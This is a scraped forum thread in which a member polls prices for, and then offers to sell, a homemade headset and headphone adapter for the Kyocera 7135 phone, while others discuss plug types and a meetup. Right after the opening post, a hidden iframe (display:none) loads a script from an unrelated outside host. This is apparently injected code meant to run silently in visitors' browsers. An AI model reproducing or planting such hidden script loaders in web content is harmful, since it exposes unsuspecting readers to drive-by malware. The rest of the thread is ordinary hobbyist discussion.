View Poll Results: How much will you pay for a headset/headphone combo adapter?

Voters
32. This poll is closed
  • $5-$10 (you cheap-skate)

9 28.13%
  • $10-$15

14 43.75%
  • $15-$20

7 21.88%
  • My entire 401k

2 6.25%
+ Reply to Thread

How much will you pay for a headset/headphone combo adapter?

Ok guys, time to put your money where your mouth is.

How much are you willing to shell out for an adapter that will take the phone's headset port and, in minimalist packaging, give you the ability to plug in a normal set of headphones and/or a standard headset?

Once I've got 10 paid orders production will begin!

PM me if you're interested.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    Sorry, but I no longer make 7135 headset adapters.

I already shelled out $40 for my stereo headset and another $649 for the phone. I need a 401k loan fast.

coolcat,
    Let me know when you do it. You have all the parts (4-barrel) worked out so that it won't short out the phone like HoTSynC warned?

If you make a tested and safe adaptor, I would love one.
    ~'kito
    pdaPhoneHome Moderator

I like your design idea... I was thinking of doing the same thing.

I debate whether or not to use a 4 connector 2.55 output instead of a 3 connector for the headseat as it would then allow for a pass through-effect for using the Kyo Stereo Earbuds (which have a cool call button on them)

Having a 1/8 output is a must! FYI-but be sure to include the microphone output as well. (i think you mentioned something about a stereo out only model instead) I believe that if anything is using the headset port then the internal mic will shut off, so if you just made a simple 4-3 stereo without a mic then you'd have to unplug it to use the phone's mic if a call came in.

If its cheap I'll buy one from you--- hopefully you can make the drive to the Twin cities for the MN Chapter Kyo-Krazy get together -"coming soon". Markito and I are organizing it when VZ launches the 7135....itd be sure nice to see you there peddling these puppies off during our kyo-party!
    iPhone therefore iAm.

hear hear, would the secretary please add coolcat to our invite list.
    ~'kito
    pdaPhoneHome Moderator

Ok guys. The adapter that I am making will give a standard stereo 1/8" (3.5mm) plug (for your headphones) and a cell-phone standard 2.5mm headset plug (mono earpiece and microphone).

This will (should, I'll verify in testing) allow you to plug in both a set of normal headphones and a headset (for the mic) at the same time. I haven't yet found the correct parts to make a pass-through for the Kyo stereo headset, but once I do I'll be making that available. I've personally never seen a headset with a 3.5mm plug, but if you want your 3.5mm to mono with a mic that can be done, or I can switch it out for a 4-barrell if you've got a stereo headset with a mic (at slightly additional cost).

These adapters will cost $10 each, plus shipping (let's say $2.00 for now, I'll let you know if that changes up or down). You can PayPal funds to me at coolcat@mac.com if you're going to do an "Instant Transfer" or pay with a PayPal balance. My PayPal account isn't set up for credit cards yet, but I can accept credit cards over the phone, or you can wait for me to get a PayPal CC account up and going (probably soon).

I've got to wait on my suppliers before I can start shipping the adapters, but I hope to have them out the door within two or three weeks.

Thanks again!

Matt (aka coolcat)

Coolcat-- would you be able to attend a MN (st. paul) Kyo-Crazy get together? It'd probably be with 1-2 months (after VZ release and we have some thing to play with)

It would be great to have these available at the get together and of course everybody who attends saves the 2 dollar shipping fee! PM me if you have any preferences for scheduling this as I would like to make sure we have an "accessory vendor" attending!!!
    iPhone therefore iAm.

A 7135 and D7A-G in a Civic Hybrid! KB2PMD's Avatar
    Coolcat -- just a question: When you say cell-phone standard 2.5 mm plug, do you mean a three-connector plug that will allow for mono audio and microphone input, or a four-connector plug that will allow for stereo audio and microphone input? True, you can "patch" the audio from the mono channel to both earphones, but it wouldn't be truly stereo then, you'd just hear what comes out of the left channel in both ears.
    If you haven't already, please vote on a bluetooth voice AND data adapter for the 7135 (that plugs into the serial port, leaving your expansion card slot free!)

"My entire 401k " is probably worth $5-$10.00 these days!!!

Originally posted by tripm
    "My entire 401k " is probably worth $5-$10.00 these days!!!
    I know! That's the joke!

Mine too!

Matt, thanks so much!!!
    ~'kito
    pdaPhoneHome Moderator

Originally posted by KB2PMD
    Coolcat -- just a question: When you say cell-phone standard 2.5 mm plug, do you mean a three-connector plug that will allow for mono audio and microphone input, or a four-connector plug that will allow for stereo audio and microphone input? True, you can "patch" the audio from the mono channel to both earphones, but it wouldn't be truly stereo then, you'd just hear what comes out of the left channel in both ears.
    KB2PMD,

I'm talking about mono audio out and microphone in. I haven't yet found the correct parts to make a 4-barrell out, but if I can then I'll certainly make that available as well. I don't think that a 3-b headset would work properly in a 4-b jack, though a 4-b headset may work with a 3-b jack (reference all the shorting out problems everybody's worried about). I wanted to make the first adapters compatible with the largest number of headsets possible, and the majority of them are the 3-barrell mic/mono audio type.

I'll certainly let everone know when/if the 4-barrell models are available.

A 7135 and D7A-G in a Civic Hybrid! KB2PMD's Avatar
    A few months ago, I'd purhased some four-barrel 1/8" connectors for one of my amateur radios (VX-5R). I'll see if I can find where I purchased them... I think they had 1/32" four-conductor connectors as well.
    -M
    If you haven't already, please vote on a bluetooth voice AND data adapter for the 7135 (that plugs into the serial port, leaving your expansion card slot free!)

poked back in
    All I want is for it to plug into my casette adapter and play in STEREO which uses the headphone plug that's used in CD players, computers and Mp3 players. not the dinky cellphone one or the big mic one.

Work on the other stuff or whozawhatits later.
    I'll send the cash by paypal when I have enough evidence to convice me it won't damage my phone. The other requirement was for Sprint to confirm it, but since that plane flight commercial showed it, I'm in the clear.

Originally posted by M3wThr33
    All I want is for it to plug into my casette adapter and play in STEREO which uses the headphone plug that's used in CD players, computers and Mp3 players. not the dinky cellphone one or the big mic one.
    M3wThr33,

My adapter will work for you to play the 7135 through your casette adapter and for standard heaphone sets. It's got the "normal" sized 1/8th (3.5mm) stereo headset jack on it that's used on pretty much everything in the world (except cellphones).

If you want to order one without the 2nd jack, which adapts to a standard 3 conductor 2.5mm cellphone jack for mono audio and microphone, I can certainly accomodate you.

"Customer Service" That's my middle name!:wink